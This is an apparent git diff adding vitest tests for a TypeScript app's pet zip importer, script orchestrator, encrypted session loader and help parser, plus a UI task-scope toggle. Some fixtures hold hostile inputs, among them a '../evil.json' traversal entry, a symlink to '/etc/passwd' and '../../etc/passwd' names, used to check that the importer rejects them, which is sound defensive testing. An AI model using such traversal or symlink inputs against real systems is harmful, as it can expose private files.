mkdirSync(join(petsDir(), 'no-manifest'), { recursive: true }); + mkdirSync(join(petsDir(), 'Invalid ID'), { recursive: true }); + const pets = listPets(root, USER); + expect(pets.map(p => p.id)).toEqual(['valid']); + }); + + it('skips plain files in the pets directory', () => { + writeFileSync(join(petsDir(), 'stray.txt'), 'x'); + expect(listPets(root, USER)).toEqual([]); + }); +}); + +describe('getPet', () => { + it('returns null for an invalid pet id', () => { + expect(getPet(root, USER, '../escape')).toBeNull(); + expect(getPet(root, USER, 'UPPER')).toBeNull(); + }); + + it('returns null for a missing pet', () => { + expect(getPet(root, USER, 'nope')).toBeNull(); + }); + + it('prefers displayName over name over id', () => { + makePetDir('p1', { displayName: 'Display', name: 'Plain' }); + makePetDir('p2', { name: 'Plain' }); + makePetDir('p3', {}); + expect(getPet(root, USER, 'p1')!.name).toBe('Display'); + expect(getPet(root, USER, 'p2')!.name).toBe('Plain'); + expect(getPet(root, USER, 'p3')!.name).toBe('p3'); + }); + + it('picks sprite and preview files only when they exist on disk', () => { + makePetDir( + 'p1', + { spritesheet: 'sheet.png', preview: 'thumb.png' }, + { 'sheet.png': Buffer.from('png') }, + ); + const pet = getPet(root, USER, 'p1')!; + expect(pet.spriteFile).toBe('sheet.png'); + expect(pet.previewFile).toBeNull(); // thumb.png referenced but absent + }); + + it('falls back to conventional sprite/preview filenames', () => { + makePetDir('p1', {}, { + 'spritesheet.webp': Buffer.from('w'), + 'preview.png': Buffer.from('p'), + }); + const pet = getPet(root, USER, 'p1')!; + expect(pet.spriteFile).toBe('spritesheet.webp'); + expect(pet.previewFile).toBe('preview.png'); + }); + + it('resolves sprite from a nested manifest object with a file key', () => { + makePetDir( + 'p1', + { spritesheet: { file: 'art.png', frameWidth: 32, frameHeight: 32 } }, + { 'art.png': Buffer.from('x') }, + ); + const pet = getPet(root, USER, 'p1')!; + expect(pet.spriteFile).toBe('art.png'); + expect(pet.frameWidth).toBe(32); + expect(pet.frameHeight).toBe(32); + }); + + it('reads frame dimensions and grid from top-level manifest keys', () => { + makePetDir('p1', { frameWidth: 64, frameHeight: 48, gridCols: 4, gridRows: 2 }); + const pet = getPet(root, USER, 'p1')!; + expect(pet.frameWidth).toBe(64); + expect(pet.frameHeight).toBe(48); + expect(pet.gridCols).toBe(4); + expect(pet.gridRows).toBe(2); + }); + + it('supports snake_case frame keys', () => { + makePetDir('p1', { frame_width: 16, frame_height: 24 }); + const pet = getPet(root, USER, 'p1')!; + expect(pet.frameWidth).toBe(16); + expect(pet.frameHeight).toBe(24); + }); + + it('nulls both frame dimensions when only one is given', () => { + makePetDir('p1', { frameWidth: 64 }); + const pet = getPet(root, USER, 'p1')!; + expect(pet.frameWidth).toBeNull(); + expect(pet.frameHeight).toBeNull(); + }); + + it('ignores out-of-range or non-integer dimensions', () => { + makePetDir('p1', { frameWidth: 0, frameHeight: 5000, gridCols: 1.5, gridRows: -1 }); + const pet = getPet(root, USER, 'p1')!; + expect(pet.frameWidth).toBeNull(); + expect(pet.gridCols).toBeNull(); + expect(pet.gridRows).toBeNull(); + }); + + it('exposes the full manifest and an ISO updatedAt', () => { + makePetDir('p1', { name: 'X', custom: true }); + const pet = getPet(root, USER, 'p1')!; + expect(pet.manifest).toEqual({ name: 'X', custom: true }); + expect(() => new Date(pet.updatedAt).toISOString()).not.toThrow(); + }); + + it('throws PetValidationError for a corrupt manifest', () => { + const dir = join(petsDir(), 'bad'); + mkdirSync(dir, { recursive: true }); + writeFileSync(join(dir, 'pet.json'), '{broken'); + expect(() => getPet(root, USER, 'bad')).toThrow(PetValidationError); + }); + + it('throws PetValidationError for an array manifest', () => { + const dir = join(petsDir(), 'arr'); + mkdirSync(dir, { recursive: true }); + writeFileSync(join(dir, 'pet.json'), '[1,2]'); + expect(() => getPet(root, USER, 'arr')).toThrow(/manifest must be an object/); + }); +}); + +// ── importPetZip ────────────────────────────────────────────────────────────── + +describe('importPetZip', () => { + it('imports a root-level pet package', () => { + const zip = makeZip({ + 'pet.json': JSON.stringify({ name: 'Whiskers', frameWidth: 32, frameHeight: 32 }), + 'spritesheet.png': Buffer.from('fakepng'), + }); + const detail = importPetZip(root, USER, zip); + expect(detail.id).toBe('whiskers'); + expect(detail.name).toBe('Whiskers'); + expect(detail.spriteFile).toBe('spritesheet.png'); + expect(existsSync(join(petsDir(), 'whiskers', 'spritesheet.png'))).toBe(true); + }); + + it('strips a single base directory prefix', () => { + const zip = makeZip({ + 'mypet/pet.json': JSON.stringify({}), + 'mypet/spritesheet.png': Buffer.from('x'), + }); + const detail = importPetZip(root, USER, zip); + expect(detail.id).toBe('mypet'); // derived from the base dir name + expect(detail.spriteFile).toBe('spritesheet.png'); + }); + + it('uses manifest id over name over base dir for the pet id', () => { + const zip = makeZip({ + 'pet.json': JSON.stringify({ id: 'Custom-ID', name: 'Other' }), + }); + expect(importPetZip(root, USER, zip).id).toBe('custom-id'); + }); + + it('prefers options.preferredId over the manifest', () => { + const zip = makeZip({ 'pet.json': JSON.stringify({ id: 'from-manifest' }) }); + const detail = importPetZip(root, USER, zip, { preferredId: 'Forced Name' }); + expect(detail.id).toBe('forced-name'); + }); + + it('throws PetConflictError on duplicate import without overwrite', () => { + const zip = makeZip({ 'pet.json': JSON.stringify({ id: 'dup' }) }); + importPetZip(root, USER, zip); + expect(() => importPetZip(root, USER, zip)).toThrow(PetConflictError); + try { + importPetZip(root, USER, zip); + } catch (err) { + expect((err as PetConflictError).petId).toBe('dup'); + } + }); + + it('overwrites and trashes the previous version with overwrite: true', () => { + importPetZip(root, USER, makeZip({ + 'pet.json': JSON.stringify({ id: 'dup', name: 'Old' }), + })); + const detail = importPetZip(root, USER, makeZip({ + 'pet.json': JSON.stringify({ id: 'dup', name: 'New' }), + }), { overwrite: true }); + expect(detail.name).toBe('New'); + const trashed = readdirSync(trashDir()); + expect(trashed.some(f => f.endsWith('-dup-pet'))).toBe(true); + }); + + it('rejects an empty body and an oversized body without parsing', () => { + expect(() => importPetZip(root, USER, Buffer.alloc(0))).toThrow(/zip body is empty/); + expect(() => importPetZip(root, USER, Buffer.alloc(12 * 1024 * 1024 + 1))) + .toThrow(/zip body is too large/); + }); + + it('rejects a zip without entries', () => { + expect(() => importPetZip(root, USER, new AdmZip().toBuffer())).toThrow(/zip is empty/); + }); + + it('requires pet.json', () => { + const zip = makeZip({ 'spritesheet.png': Buffer.from('x') }); + expect(() => importPetZip(root, USER, zip)).toThrow(/pet\.json is required/); + }); + + it('rejects path traversal entry names', () => { + // adm-zip's addFile canonicalizes '../', so byte-patch a same-length + // placeholder to get a genuinely hostile entry name into the archive. + const zip = makeZip({ + 'pet.json': JSON.stringify({}), + 'AA/evil.json': '{}', + }); + const patched = Buffer.from( + zip.toString('latin1').split('AA/evil.json').join('../evil.json'), + 'latin1', + ); + expect(() => importPetZip(root, USER, patched)).toThrow(/unsafe path/); + }); + + it('rejects dotfile entries', () => { + const zip = makeZip({ + 'pet.json': JSON.stringify({}), + '.hidden.json': '{}', + }); + expect(() => importPetZip(root, USER, zip)).toThrow(/unsafe path/); + }); + + it('rejects unsupported file types', () => { + const zip = makeZip({ + 'pet.json': JSON.stringify({}), + 'run.sh': 'echo pwned', + }); + expect(() => importPetZip(root, USER, zip)).toThrow(/unsupported file type/); + }); + + it('rejects nested files below the package root', () => { + const zip = makeZip({ + 'pet.json': JSON.stringify({}), + 'sub/inner.png': Buffer.from('x'), + }); + expect(() => importPetZip(root, USER, zip)).toThrow(/nested files are not supported/); + }); + + it('rejects symlink entries', () => { + const zip = new AdmZip(); + zip.addFile('pet.json', Buffer.from('{}')); + zip.addFile('link.json', Buffer.from('/etc/passwd')); + // addFile's attr argument is not preserved through toBuffer; set the unix + // mode (high 16 bits, 0o120000 = symlink) directly on the entry header. + const link = zip.getEntry('link.json'); + if (!link) throw new Error('fixture entry missing'); + link.header.attr = (0o120777 << 16) >>> 0; + expect(() => importPetZip(root, USER, zip.toBuffer())).toThrow(/symlinks are not allowed/); + }); + + it('rejects too many files', () => { + const files: Record = { 'pet.json': '{}' }; + for (let i = 0; i < 32; i++) files[`extra-${i}.json`] = '{}'; // 33 total + expect(() => importPetZip(root, USER, makeZip(files))).toThrow(/too many files/); + }); + + it('rejects a single file over 5 MB uncompressed', () => { + const zip = makeZip({ + 'pet.json': JSON.stringify({}), + 'big.png': Buffer.alloc(5 * 1024 * 1024 + 1), + }); + expect(() => importPetZip(root, USER, zip)).toThrow(/file is too large/); + }); + + it('rejects total uncompressed size over 10 MB', () => { + const fourMb = 4 * 1024 * 1024; + const zip = makeZip({ + 'pet.json': JSON.stringify({}), + 'a.png': Buffer.alloc(fourMb), + 'b.png': Buffer.alloc(fourMb), + 'c.png': Buffer.alloc(fourMb), + }); + expect(() => importPetZip(root, USER, zip)).toThrow(/uncompressed size is too large/); + }); + + it('rejects a non-object manifest', () => { + const zip = makeZip({ 'pet.json': '[1,2,3]' }); + expect(() => importPetZip(root, USER, zip)).toThrow(/manifest must be an object/); + }); + + it('cleans up the staging tmp dir on failure', () => { + const zip = makeZip({ + 'pet.json': JSON.stringify({}), + 'run.sh': 'x', + }); + expect(() => importPetZip(root, USER, zip)).toThrow(PetValidationError); + const leftovers = readdirSync(petsDir()).filter(n => n.startsWith('.tmp-')); + expect(leftovers).toEqual([]); + }); +}); + +// ── deletePet ───────────────────────────────────────────────────────────────── + +describe('deletePet', () => { + it('returns false for an invalid or missing pet', () => { + expect(deletePet(root, USER, '../escape')).toBe(false); + expect(deletePet(root, USER, 'nope')).toBe(false); + }); + + it('moves the pet directory to trash and returns true', () => { + makePetDir('cat', { name: 'Cat' }); + expect(deletePet(root, USER, 'cat')).toBe(true); + expect(existsSync(join(petsDir(), 'cat'))).toBe(false); + const trashed = readdirSync(trashDir()); + expect(trashed.some(f => f.endsWith('-cat-pet'))).toBe(true); + }); + + it('clears activePetId when the active pet is deleted', () => { + makePetDir('cat', {}); + writePetSettings(root, USER, { activePetId: 'cat' }); + deletePet(root, USER, 'cat'); + expect(readPetSettings(root, USER).activePetId).toBeNull(); + }); + + it('removes workerPets mappings pointing at the deleted pet, keeps others', () => { + makePetDir('cat', {}); + makePetDir('dog', {}); + writePetSettings(root, USER, { workerPets: { w1: 'cat', w2: 'dog' } }); + deletePet(root, USER, 'cat'); + expect(readPetSettings(root, USER).workerPets).toEqual({ w2: 'dog' }); + }); + + it('leaves settings untouched when the pet was not referenced', () => { + makePetDir('cat', {}); + makePetDir('dog', {}); + writePetSettings(root, USER, { activePetId: 'dog', workerPets: { w1: 'dog' } }); + deletePet(root, USER, 'cat'); + const s = readPetSettings(root, USER); + expect(s.activePetId).toBe('dog'); + expect(s.workerPets).toEqual({ w1: 'dog' }); + }); +}); + +// ── resolvePetAsset ─────────────────────────────────────────────────────────── + +describe('resolvePetAsset', () => { + beforeEach(() => { + makePetDir('cat', { name: 'Cat' }, { + 'spritesheet.png': Buffer.from('png'), + 'preview.webp': Buffer.from('webp'), + }); + }); + + it('resolves existing files with the right content type', () => { + const png = resolvePetAsset(root, USER, 'cat', 'spritesheet.png'); + expect(png).not.toBeNull(); + expect(png!.contentType).toBe('image/png'); + expect(png!.path).toBe(join(petsDir(), 'cat', 'spritesheet.png')); + + expect(resolvePetAsset(root, USER, 'cat', 'preview.webp')!.contentType).toBe('image/webp'); + expect(resolvePetAsset(root, USER, 'cat', 'pet.json')!.contentType) + .toBe('application/json; charset=utf-8'); + }); + + it('returns null for an invalid pet id', () => { + expect(resolvePetAsset(root, USER, 'BAD ID', 'pet.json')).toBeNull(); + }); + + it('returns null for unsafe file names', () => { + expect(resolvePetAsset(root, USER, 'cat', '')).toBeNull(); + expect(resolvePetAsset(root, USER, 'cat', 'a/b.png')).toBeNull(); + expect(resolvePetAsset(root, USER, 'cat', 'a\\b.png')).toBeNull(); + expect(resolvePetAsset(root, USER, 'cat', '.hidden.png')).toBeNull(); + expect(resolvePetAsset(root, USER, 'cat', '..')).toBeNull(); + }); + + it('returns null for disallowed extensions', () => { + expect(resolvePetAsset(root, USER, 'cat', 'script.js')).toBeNull(); + expect(resolvePetAsset(root, USER, 'cat', 'noext')).toBeNull(); + }); + + it('returns null when the file does not exist', () => { + expect(resolvePetAsset(root, USER, 'cat', 'missing.png')).toBeNull(); + }); +}); diff --git a/src/user-folder/script-orchestrator.test.ts b/src/user-folder/script-orchestrator.test.ts new file mode 100644 index 0000000..87724e8 --- /dev/null +++ b/src/user-folder/script-orchestrator.test.ts @@ -0,0 +1,158 @@ +import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; +import { mkdtempSync, rmSync, mkdirSync, writeFileSync } from 'fs'; +import { join } from 'path'; +import { tmpdir } from 'os'; +import type { BrowserSessionRepo } from '../db/browser-session-repo.js'; + +vi.mock('./script-runner.js', async (importOriginal) => { + const actual = await importOriginal(); + return { ...actual, runUserScript: vi.fn() }; +}); +vi.mock('./session-loader.js', () => ({ loadSessionStateForUser: vi.fn() })); + +import { runUserScript } from './script-runner.js'; +import { loadSessionStateForUser } from './session-loader.js'; +import { resolveScriptForKind, resolveAndRunUserScript } from './script-orchestrator.js'; + +const USER = 'user-1'; +let root: string; + +function addMacro(name: string, source = 'export default async () => 1;\n'): string { + const dir = join(root, USER, 'browser-macros'); + mkdirSync(dir, { recursive: true }); + const p = join(dir, name); + writeFileSync(p, source); + return p; +} + +const MACRO_WITH_SESSION = `--- +description: needs a session +session_profile_id: 7 +--- +export default async () => 'macro'; +`; + +beforeEach(() => { + root = mkdtempSync(join(tmpdir(), 'script-orch-test-')); + vi.clearAllMocks(); + vi.mocked(runUserScript).mockResolvedValue({ result: 'ran', logs: ['l1'], durationMs: 12 } as never); +}); + +afterEach(() => { + rmSync(root, { recursive: true, force: true }); +}); + +describe('resolveScriptForKind', () => { + it('resolves a browser-macro to its path with the playwright runtime', () => { + const p = addMacro('macro.js'); + const r = resolveScriptForKind(root, USER, 'macro.js', 'browser-macro'); + expect(r).toEqual({ scriptPath: p, subdir: 'browser-macros', runtime: 'playwright' }); + }); + + it('resolves without an explicit kind', () => { + const p = addMacro('macro.js'); + const r = resolveScriptForKind(root, USER, 'macro.js', undefined); + expect(r).toMatchObject({ scriptPath: p, subdir: 'browser-macros' }); + }); + + it('returns an error for a missing macro', () => { + const r = resolveScriptForKind(root, USER, 'ghost.js', undefined); + expect(r).toEqual({ error: 'browser-macro not found: browser-macros/ghost.js' }); + }); + + it('treats traversal names as not found instead of escaping', () => { + const r = resolveScriptForKind(root, USER, '../../etc/passwd', undefined); + expect('error' in r).toBe(true); + }); +}); + +describe('resolveAndRunUserScript', () => { + it('runs a macro and appends .js to the name', async () => { + const p = addMacro('task.js'); + const r = await resolveAndRunUserScript({ rootDir: root, userId: USER, name: 'task', params: { a: 1 } }); + expect(r).toMatchObject({ + ok: true, result: 'ran', logs: ['l1'], subdir: 'browser-macros', runtime: 'playwright', + }); + expect(runUserScript).toHaveBeenCalledWith( + expect.objectContaining({ + scriptPath: p, params: { a: 1 }, runtime: 'playwright', timeoutMs: 60_000, + }), + ); + expect(loadSessionStateForUser).not.toHaveBeenCalled(); + }); + + it('returns an error result for an unknown macro', async () => { + const r = await resolveAndRunUserScript({ rootDir: root, userId: USER, name: 'ghost', params: {} }); + expect(r.ok).toBe(false); + if (!r.ok) expect(r.error).toContain('not found'); + expect(runUserScript).not.toHaveBeenCalled(); + }); + + it('runs a macro without a session profile directly (no storageState)', async () => { + addMacro('macro.js'); + const r = await resolveAndRunUserScript({ + rootDir: root, userId: USER, name: 'macro', params: {}, headless: false, + }); + expect(r).toMatchObject({ ok: true, subdir: 'browser-macros', runtime: 'playwright' }); + expect(runUserScript).toHaveBeenCalledWith( + expect.objectContaining({ storageState: undefined, headless: false }), + ); + }); + + it('fails when a macro declares a session but no repo is configured', async () => { + addMacro('macro.js', MACRO_WITH_SESSION); + const r = await resolveAndRunUserScript({ rootDir: root, userId: USER, name: 'macro', params: {} }); + expect(r.ok).toBe(false); + if (!r.ok) expect(r.error).toContain('BrowserSessionRepo not configured'); + expect(runUserScript).not.toHaveBeenCalled(); + }); + + it('propagates session load failures', async () => { + addMacro('macro.js', MACRO_WITH_SESSION); + vi.mocked(loadSessionStateForUser).mockResolvedValue({ + ok: false, + error: { kind: 'profile_not_found', message: 'profile 7 not found' }, + } as never); + const r = await resolveAndRunUserScript({ + rootDir: root, userId: USER, name: 'macro', params: {}, + sessRepo: {} as BrowserSessionRepo, masterKeyPath: '/k', + }); + expect(r.ok).toBe(false); + if (!r.ok) expect(r.error).toBe('profile 7 not found'); + }); + + it('hydrates storageState and passes it to the runner', async () => { + addMacro('macro.js', MACRO_WITH_SESSION); + const state = { cookies: [] }; + vi.mocked(loadSessionStateForUser).mockResolvedValue({ ok: true, storageState: state } as never); + const r = await resolveAndRunUserScript({ + rootDir: root, userId: USER, name: 'macro', params: {}, + sessRepo: {} as BrowserSessionRepo, masterKeyPath: '/k', timeoutMs: 5000, + }); + expect(r.ok).toBe(true); + expect(loadSessionStateForUser).toHaveBeenCalledWith( + { sessRepo: {}, masterKeyPath: '/k' }, USER, 7, + ); + expect(runUserScript).toHaveBeenCalledWith( + expect.objectContaining({ storageState: state, timeoutMs: 5000 }), + ); + }); + + it('reports a frontmatter parse failure', async () => { + addMacro('macro.js', '---\nsession_profile_id: -2\n---\nbody'); + const r = await resolveAndRunUserScript({ rootDir: root, userId: USER, name: 'macro', params: {} }); + expect(r.ok).toBe(false); + if (!r.ok) expect(r.error).toContain('failed to parse script frontmatter'); + }); + + it('never throws when the runner fails — returns ok:false with duration', async () => { + addMacro('boom.js'); + vi.mocked(runUserScript).mockRejectedValue(new Error('script exploded')); + const r = await resolveAndRunUserScript({ rootDir: root, userId: USER, name: 'boom', params: {} }); + expect(r.ok).toBe(false); + if (!r.ok) { + expect(r.error).toBe('script exploded'); + expect(typeof r.durationMs).toBe('number'); + } + }); +}); diff --git a/src/user-folder/session-loader.test.ts b/src/user-folder/session-loader.test.ts new file mode 100644 index 0000000..2448140 --- /dev/null +++ b/src/user-folder/session-loader.test.ts @@ -0,0 +1,110 @@ +import { describe, it, expect, beforeEach, afterEach } from 'vitest'; +import { mkdtempSync, rmSync } from 'fs'; +import { join } from 'path'; +import { tmpdir } from 'os'; +import type { BrowserSessionRepo } from '../db/browser-session-repo.js'; +import { + initMasterKey, + generateUserDek, + encryptUserDek, + encryptStateBlob, +} from '../crypto/sessions.js'; +import { loadSessionStateForUser } from './session-loader.js'; + +const OWNER = 'user-1'; +const STATE = { cookies: [{ name: 'sid', value: 'abc' }], origins: [] }; + +let dir: string; +let masterKeyPath: string; + +beforeEach(() => { + dir = mkdtempSync(join(tmpdir(), 'session-loader-test-')); + masterKeyPath = join(dir, 'master.key'); +}); + +afterEach(() => { + rmSync(dir, { recursive: true, force: true }); +}); + +/** Build a stub repo + a valid encrypted blob for OWNER. */ +function makeFixture(overrides: { + profile?: Record | null; + encDek?: Buffer | null; +} = {}) { + const master = initMasterKey(masterKeyPath); + const dek = generateUserDek(); + const encDek = overrides.encDek !== undefined ? overrides.encDek : encryptUserDek(master, dek); + const blob = encryptStateBlob(dek, JSON.stringify(STATE)); + const profile = + overrides.profile !== undefined + ? overrides.profile + : { id: 7, ownerId: OWNER, status: 'active', encryptedStateBlob: blob }; + + const sessRepo = { + getProfileById: (id: number, ownerId: string) => + profile && id === 7 && ownerId === OWNER ? profile : null, + getUserDek: (userId: string) => (userId === OWNER ? encDek : null), + } as unknown as BrowserSessionRepo; + + return { sessRepo, blob }; +} + +describe('loadSessionStateForUser', () => { + it('decrypts and parses the storageState for an active profile', async () => { + const { sessRepo } = makeFixture(); + const res = await loadSessionStateForUser({ sessRepo, masterKeyPath }, OWNER, 7); + expect(res).toEqual({ ok: true, storageState: STATE }); + }); + + it('reports profile_not_found for an unknown id', async () => { + const { sessRepo } = makeFixture(); + const res = await loadSessionStateForUser({ sessRepo, masterKeyPath }, OWNER, 999); + expect(res.ok).toBe(false); + if (!res.ok) expect(res.error.kind).toBe('profile_not_found'); + }); + + it('reports profile_not_found when the profile belongs to another user', async () => { + const { sessRepo } = makeFixture(); + const res = await loadSessionStateForUser({ sessRepo, masterKeyPath }, 'other-user', 7); + expect(res.ok).toBe(false); + if (!res.ok) expect(res.error.kind).toBe('profile_not_found'); + }); + + it('reports profile_not_active for a non-active status', async () => { + const base = makeFixture(); + const { sessRepo } = makeFixture({ + profile: { id: 7, ownerId: OWNER, status: 'pending', encryptedStateBlob: base.blob }, + }); + const res = await loadSessionStateForUser({ sessRepo, masterKeyPath }, OWNER, 7); + expect(res.ok).toBe(false); + if (!res.ok) { + expect(res.error.kind).toBe('profile_not_active'); + expect(res.error.message).toContain('status=pending'); + } + }); + + it('reports profile_not_active when the blob is missing', async () => { + const { sessRepo } = makeFixture({ + profile: { id: 7, ownerId: OWNER, status: 'active', encryptedStateBlob: null }, + }); + const res = await loadSessionStateForUser({ sessRepo, masterKeyPath }, OWNER, 7); + expect(res.ok).toBe(false); + if (!res.ok) expect(res.error.kind).toBe('profile_not_active'); + }); + + it('reports dek_not_found when the user has no stored DEK', async () => { + const { sessRepo } = makeFixture({ encDek: null }); + const res = await loadSessionStateForUser({ sessRepo, masterKeyPath }, OWNER, 7); + expect(res.ok).toBe(false); + if (!res.ok) expect(res.error.kind).toBe('dek_not_found'); + }); + + it('reports decrypt_error for a corrupted blob and never throws', async () => { + const { sessRepo } = makeFixture({ + profile: { id: 7, ownerId: OWNER, status: 'active', encryptedStateBlob: Buffer.from('garbage') }, + }); + const res = await loadSessionStateForUser({ sessRepo, masterKeyPath }, OWNER, 7); + expect(res.ok).toBe(false); + if (!res.ok) expect(res.error.kind).toBe('decrypt_error'); + }); +}); diff --git a/ui/src/App.tsx b/ui/src/App.tsx index fc0a545..3347e68 100644 --- a/ui/src/App.tsx +++ b/ui/src/App.tsx @@ -353,6 +353,12 @@ function AppInner({ isAdmin, authEnabled, user }: { isAdmin: boolean; authEnable sortMode: sort, searchQuery: search, activeTaskId: localTaskId, + // Owner scope (自分/すべて). Only active when auth is on — in no-auth mode + // every task is owned by 'local' and the toggle would be meaningless. + scope: urlState.scope, + onScopeChange: (scope: 'mine' | 'all') => setUrlState(prev => ({ ...prev, scope })), + currentUserId: user?.id ?? null, + scopeEnabled: authEnabled && !!user, onStatusChange: (s: string) => setUrlState(prev => ({ ...prev, status: s as typeof status })), onSortChange: (s: string) => setUrlState(prev => ({ ...prev, sort: s as typeof sort })), onSearchChange: (q: string) => setUrlState(prev => ({ ...prev, search: q })), diff --git a/ui/src/components/list/TaskListPanel.tsx b/ui/src/components/list/TaskListPanel.tsx index 87b21d1..1ac8f0d 100644 --- a/ui/src/components/list/TaskListPanel.tsx +++ b/ui/src/components/list/TaskListPanel.tsx @@ -1,6 +1,7 @@ import { LocalTask } from '../../api'; import { matchText } from '../../lib/utils'; import { COLUMN_LIST, SortMode, StatusColumn } from '../../lib/urlState'; +import { filterTasksByScope, type TaskScope } from '../../lib/taskScope'; import { FilterBar } from './FilterBar'; import { LocalTaskListItem } from './TaskListItem'; import { RailPanel } from './RailPanel'; @@ -16,14 +17,56 @@ interface TaskListPanelProps { onSearchChange: (q: string) => void; onSelectTask: (id: number) => void; onOpenCreate: () => void; + /** + * Owner scope (mine/all). Only meaningful when scopeEnabled — auth must be + * on and the viewer known; otherwise everything is owner 'local' and the + * control is hidden. + */ + scope?: TaskScope; + onScopeChange?: (scope: TaskScope) => void; + currentUserId?: string | null; + scopeEnabled?: boolean; /** 'rail' 時は RailPanel を render する。default 'list'。 */ mode?: 'list' | 'rail'; /** rail mode 時の「リストに戻る」ボタンで呼ばれる。 */ onExitFocused?: () => void; } +function ScopeToggle({ + scope, + mineCount, + allCount, + onScopeChange, +}: { + scope: TaskScope; + mineCount: number; + allCount: number; + onScopeChange: (scope: TaskScope) => void; +}) { + const seg = (value: TaskScope, label: string, count: number) => ( + + ); + return ( +
+ {seg('mine', '自分', mineCount)} + {seg('all', 'すべて', allCount)} +
+ ); +} + export function TaskListPanel({ - localTasks, + localTasks: allTasks, selectedStatus, sortMode, searchQuery, @@ -33,9 +76,17 @@ export function TaskListPanel({ onSearchChange, onSelectTask, onOpenCreate, + scope = 'mine', + onScopeChange, + currentUserId = null, + scopeEnabled = false, mode = 'list', onExitFocused, }: TaskListPanelProps) { + // Owner scope is the outermost filter: status counts / search / sort all + // operate on the scoped list so "自分" mode never counts others' tasks. + const effectiveScope: TaskScope = scopeEnabled ? scope : 'all'; + const localTasks = filterTasksByScope(allTasks, effectiveScope, currentUserId); if (mode === 'rail') { const localColumnsRail: Record = COLUMN_LIST.reduce((acc, s) => { acc[s] = localTasks.filter(t => (t.latestJob?.status ?? 'queued') === s); @@ -111,6 +162,14 @@ export function TaskListPanel({ 新しい依頼 + {scopeEnabled && onScopeChange && ( + + )}
{totalCount} diff --git a/ui/src/lib/help.test.ts b/ui/src/lib/help.test.ts new file mode 100644 index 0000000..c1f09e5 --- /dev/null +++ b/ui/src/lib/help.test.ts @@ -0,0 +1,157 @@ +// NOTE: renderHelpHtml is NOT covered here — it depends on DOMPurify, which +// requires a real DOM (DOMPurify.isSupported === false in this node test +// environment, sanitize is not callable). Everything else in help.ts is pure. +import { describe, it, expect } from 'vitest'; +import { + splitFrontmatter, + validateFrontmatter, + parseHelpDoc, + slugify, + makeSlugger, + filterSections, + type HelpSection, +} from './help'; + +const DOC = `--- +id: getting-started +title: はじめに +category: basic +order: 1 +keywords: [setup, 初期設定] +--- +# はじめに + +本文です。`; + +describe('splitFrontmatter', () => { + it('splits the frontmatter block from the body', () => { + const { frontmatter, body } = splitFrontmatter(DOC); + expect(frontmatter).toContain('id: getting-started'); + expect(body).toContain('# はじめに'); + expect(body).not.toContain('---'); + }); + + it('returns the whole input as body when there is no frontmatter', () => { + const { frontmatter, body } = splitFrontmatter('plain body'); + expect(frontmatter).toBe(''); + expect(body).toBe('plain body'); + }); + + it('normalizes CRLF and strips a BOM', () => { + const { frontmatter, body } = splitFrontmatter('---\r\nid: x\r\n---\r\nbody'); + expect(frontmatter).toBe('id: x'); + expect(body).toBe('body'); + }); + + it('ignores a frontmatter block not at the very start', () => { + const { frontmatter } = splitFrontmatter('intro\n---\nid: x\n---\n'); + expect(frontmatter).toBe(''); + }); +}); + +describe('validateFrontmatter', () => { + const VALID = { id: 'a', title: 't', category: 'basic', order: 1, keywords: ['k'] }; + + it('accepts a valid frontmatter object', () => { + const r = validateFrontmatter(VALID, 'doc.md'); + expect(r.ok).toBe(true); + expect(r.value).toEqual(VALID); + }); + + it('defaults keywords to an empty array', () => { + const r = validateFrontmatter({ ...VALID, keywords: undefined }, 'doc.md'); + expect(r.ok).toBe(true); + expect(r.value?.keywords).toEqual([]); + }); + + it.each([ + ['missing id', { ...VALID, id: '' }, /'id' is required/], + ['missing title', { ...VALID, title: undefined }, /'title' is required/], + ['bad category', { ...VALID, category: 'misc' }, /'category' must be one of/], + ['bad order', { ...VALID, order: 'first' }, /'order' is required/], + ['bad keywords', { ...VALID, keywords: [1] }, /'keywords' must be a string array/], + ])('rejects %s with a sourced error', (_label, data, re) => { + const r = validateFrontmatter(data, 'doc.md'); + expect(r.ok).toBe(false); + expect(r.errors.join('\n')).toMatch(re); + expect(r.errors[0]).toContain('doc.md'); + }); + + it('collects multiple errors for non-object input', () => { + const r = validateFrontmatter(null, 'doc.md'); + expect(r.ok).toBe(false); + expect(r.errors.length).toBeGreaterThanOrEqual(3); + }); +}); + +describe('parseHelpDoc', () => { + it('parses YAML frontmatter and body', () => { + const { data, body } = parseHelpDoc(DOC); + expect(data).toMatchObject({ id: 'getting-started', category: 'basic', keywords: ['setup', '初期設定'] }); + expect(body).toContain('本文です。'); + }); + + it('returns an empty object for a doc without frontmatter', () => { + expect(parseHelpDoc('just text').data).toEqual({}); + }); + + it('throws on YAML syntax errors', () => { + expect(() => parseHelpDoc('---\nid: [unclosed\n---\nbody')).toThrow(); + }); +}); + +describe('slugify', () => { + it('lowercases and hyphenates ascii text', () => { + expect(slugify('Getting Started!')).toBe('getting-started'); + }); + + it('keeps Japanese characters', () => { + expect(slugify('タスクの作成 方法')).toBe('タスクの作成-方法'); + }); + + it('strips HTML tags', () => { + expect(slugify('config.yaml settings')).toBe('config-yaml-settings'); + }); + + it('falls back to "section" for empty results', () => { + expect(slugify('!!!')).toBe('section'); + }); +}); + +describe('makeSlugger', () => { + it('appends -2, -3 on collisions', () => { + const slug = makeSlugger(); + expect(slug('Setup')).toBe('setup'); + expect(slug('Setup')).toBe('setup-2'); + expect(slug('Setup')).toBe('setup-3'); + expect(slug('Other')).toBe('other'); + }); +}); + +describe('filterSections', () => { + const sections: HelpSection[] = [ + { id: 'a', title: 'タスクの作成', category: 'basic', order: 1, keywords: ['task'], body: '作成手順' }, + { id: 'b', title: 'Scheduling', category: 'advanced', order: 2, keywords: ['cron'], body: 'periodic runs' }, + { id: 'c', title: 'Admin', category: 'admin', order: 3, keywords: [], body: 'ユーザー管理と権限' }, + ]; + + it('returns everything for an empty query', () => { + expect(filterSections(sections, ' ')).toEqual(sections); + }); + + it('matches the title case-insensitively', () => { + expect(filterSections(sections, 'scheduling').map((s) => s.id)).toEqual(['b']); + }); + + it('matches keywords', () => { + expect(filterSections(sections, 'CRON').map((s) => s.id)).toEqual(['b']); + }); + + it('matches the body, including Japanese', () => { + expect(filterSections(sections, '権限').map((s) => s.id)).toEqual(['c']); + }); + + it('returns an empty list when nothing matches', () => { + expect(filterSections(sections, 'zzz')).toEqual([]); + }); +}); diff --git a/ui/src/lib/taskScope.test.ts b/ui/src/lib/taskScope.test.ts new file mode 100644 index 0000000..4103c47 --- /dev/null +++ b/ui/src/lib/taskScope.test.ts @@ -0,0 +1,28 @@ +import { describe, it, 